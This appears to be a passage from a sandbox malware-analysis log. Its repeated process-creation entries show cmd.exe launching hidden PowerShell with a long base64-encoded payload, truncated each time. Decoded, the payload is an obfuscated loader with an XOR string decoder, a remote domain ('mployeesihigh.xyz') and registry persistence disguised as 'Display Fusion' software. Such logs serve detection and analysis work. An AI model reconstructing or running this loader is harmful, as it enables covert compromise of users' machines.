D0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C "cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOA
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAALQBOAGEAbQBl
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoAZAAgAC0AZQBxACAAJABuAHUAbABsACkAIAB7AAoACQAJAAkAdAByAHkAIAB7AAoACQAJAAkACQAkAHIAIAA9ACAARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAb
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c powershell -WindowStyle Hidden -E "CgAKAAoAJAB0AGUAeAB0AEEAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJADsACgAKAAoAJABqAHAAPQAkAG4AdQBsAGwAOwAKAAoAZgB1AG4AYwB0AGkAbwBuACAAZwBlAHQAdABlAHIARgB1AG4AYwAoAFsAcwB0AHIAaQBuAGcAXQAkAGIAdABzADIAKQAgAHsACgAJACQAYgB0AHMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHQAcwAyACkAOwAKAAoACQAkAHMAdAA9ACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AEIAeQB0AGUAcwAoACcARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQBWAGEAbAB1AGUAJwApADsACgAJACQAZQBkAD0AJABiAHQAcwBbADAALgAuADQAXQA7AAoACgAJACQAaQA9ADAAOwAKAAkAJABsAD0AJABlAGQALgBMAGUAbgBnAHQAaAA7AAoACQAkAGsAPQBAACgAKQA7AAoACgAJAFsAYQByAHIAYQB5AF0AOgA6AFIAZQBzAGkAegBlACgAWwByAGUAZgBdACQAawAsACQAcwB0AC4AbABlAG4AZwB0AGgAKQA7AAoACQBmAG8AcgBlAGEAYwBoACgAJABiACAAaQBuACAAJABzAHQAKQAgAHsAJABrAFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABlAGQAWwAkAGkAJQAkAGwAXQB9AAoACgAJACQAYgBzAD0AJABiAHQAcwBbADUALgAuACQAYgB0AHMALgBsAGUAbgBnAHQAaABdADsACgAKAAkAJABpAD0AMAA7AAoACQAkAGwAPQAkAGsALgBMAGUAbgBnAHQAaAA7AAoACQAkAGQAdAA9AEAAKAApADsACgAKAAkAWwBhAHIAcgBhAHkAXQA6ADoAUgBlAHMAaQB6AGUAKABbAHIAZQBmAF0AJABkAHQALAAkAGIAcwAuAGwAZQBuAGcAdABoACkAOwAKAAkAZgBvAHIAZQBhAGMAaAAoACQAYgAgAGkAbgAgACQAYgBzACkAIAB7ACQAZAB0AFsAJABpACsAKwBdAD0AJABiACAALQBiAHgAbwByACAAJABrAFsAJABpACUAJABsAF0AfQAKAAoACQByAGUAdAB1AHIAbgAgACQAdABlAHgAdABBAHMAYwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAHQAKQAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsACgB9AAoACgAKACQAdgAgAD0AIAAiADAAIgA7AAoAJABsAHYAIAA9ACAAIgA4ACIAOwAKACQAZAAgAD0AIAAiAG0AcABsAG8AeQBlAGUAcwBpAGgAaQBnAGgALgB4AHkAegAiADsACgAkAGUAcAAgAD0AIAAiAFcAeQBJADQATQBEAEkAegBNAHoAVQAzAE8ARABZADMATQBUAEEAegBPAFQAZwB4AE0ARABVAGkATABEAEUAMgBOAEQAawAzAE4ARABjADMATQBUAFIAZAAiADsACgAKACQAZwBwAE4AYQBtAGUAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABCAGkAbgBhAHIAeQBGAG8AcgB0AHIAZQBzAHMAUwBvAGYAdAB3AGEAcgBlAFwAIgA7AAoACgB0AHIAeQAgAHsACgAJACQAagBwAD0AJAB0AGUAeAB0AEEAcwBjAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAHAAKQApACAAfAAgAEMAbwBuAHYAZQByAHQARgByAG8AbQAtAEoAcwBvAG4AOwAKAH0AIABjAGEAdABjAGgAewB9AAoACgAkAGoAZAAgAD0AIAAkAG4AdQBsAGwAOwAKAAoACgAkAGEAIAA9ACAAJAB0AGUAeAB0AEEAcwBjADsACgAKACQAcgBrAGUAeQBOACAAPQAgACIARABpAHMAcABsAGEAeQAgAEYAdQBzAGkAbwBuACIAOwAKACQAdQA9ACQAagBwAFsAMABdADsACgAkAGkAcwA9ACQAagBwAFsAMQBdADsACgAKAHcAaABpAGwAZQAoACQAdAByAHUAZQApACAAewAKAAkAdAByAHkAIAB7AAoACQAJAHQAcgB5ACAAewAKAAkACQAJAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABnAHAATgBhAG0AZQApACkAIAB7AAoACQAJAAkACQBOAGUAdwAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGcAcABOAGEAbQBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AAoACQAJAAkAfQAKAAkACQB9AGMAYQB0AGMAaAB7AH0ACgAKAAkACQAkAGUAeAAgAD0AIAAkAGYAYQBsAHMAZQA7AAoACgAJAAkAaQBmACAAKAAkAGoA